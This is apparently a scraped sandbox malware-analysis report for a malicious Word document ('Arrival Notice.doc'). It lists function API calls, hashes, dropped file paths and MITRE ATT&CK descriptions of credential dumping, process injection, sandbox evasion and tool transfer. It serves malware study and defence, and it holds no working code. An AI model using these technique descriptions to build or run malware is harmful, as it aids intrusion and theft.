Instruction ID: 2e41240d5e45f5dd36f770313e788fa22544db17ad09b374e9064db72be3cd04
Opcode Fuzzy Hash: f8a8465fad712562d5804139a07f24cd524686316d81e53ff6e72a9a766fee67
Instruction Fuzzy Hash: 94D0126180911DEACB9196D0C8598BAB3FCAB18655F408456F90A91480E724D5084B61

Uniqueness

Uniqueness Score: -1.00%

Function 01342322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 0134232C
PostMessageW.USER32 ref: 0134233F

Part of subcall function 0131E97B: Sleep.KERNEL32 ref: 0131E9F3

Strings

Shell_TrayWnd, xrefs: 01342325

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 1befa51a930cb2cab70ff1bf65367dfd491cb5a1ead03b4ec72f2f1de5a4ae8d
Instruction ID: 9e72d2be390b174d665bb318648cc3b661039a6d116d949fd00b2d3b3e2cc0ed
Opcode Fuzzy Hash: 1befa51a930cb2cab70ff1bf65367dfd491cb5a1ead03b4ec72f2f1de5a4ae8d
Instruction Fuzzy Hash: DFD0A97A381340B7E278A3329C0FFCAAA189B00B10F004916B706AA1C8C8A8B8008B44

Uniqueness

Uniqueness Score: -1.00%

Function 01342356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 0134236C
PostMessageW.USER32 ref: 01342373

Part of subcall function 0131E97B: Sleep.KERNEL32 ref: 0131E9F3

Strings

Shell_TrayWnd, xrefs: 01342365

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ebd36f5dcd3f081bcd9acdb1bc45df851f726a57591193cc2621a13ca788778a
Instruction ID: 467feba99e1fb7273192c307b3a712c8e892781c810e69f420d939b152194148
Opcode Fuzzy Hash: ebd36f5dcd3f081bcd9acdb1bc45df851f726a57591193cc2621a13ca788778a
Instruction Fuzzy Hash: 3DD0A976382340BBE278A3329C0FFCAA6189B04B10F004916B702AA1C8C8A8B8008B48

Uniqueness

Uniqueness Score: -1.00%

Function 012EBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 012EBE93
GetLastError.KERNEL32 ref: 012EBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 012EBEFC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 42d184425c8796caf11dcc270313ba06f5c6fe3ebae4055704ede36ea649b0a1
Instruction ID: cf95bfde946346e48347db4faffc9a451062b0427ee5f52f6bae171abe2095ff
Opcode Fuzzy Hash: 42d184425c8796caf11dcc270313ba06f5c6fe3ebae4055704ede36ea649b0a1
Instruction Fuzzy Hash: 2A41FA35625207AFDF318F68C84CABA7BE5EF41310F944159FB59571A1DB319D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Arrival Notice.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\BE[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlite-dll-win32-x86-3240000[1].zip

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{914B2F69-82DC-46CC-8DD8-1FA442E30CC1}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0BB92122-B0F3-4D68-A452-FB6259A56894}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7968B847-E29D-41C0-ACB8-AE84D1770DC9}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C3CBF28E-459B-48B7-84CD-B236D108BA2C}.tmp

C:\Users\user\AppData\Local\Temp\-e04230_

C:\Users\user\AppData\Local\Temp\Vevine

C:\Users\user\AppData\Local\Temp\autC37F.tmp

C:\Users\user\AppData\Local\Temp\autC3CE.tmp

Windows Analysis Report
Arrival Notice.doc

Function 012B42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 012B42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 012F2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre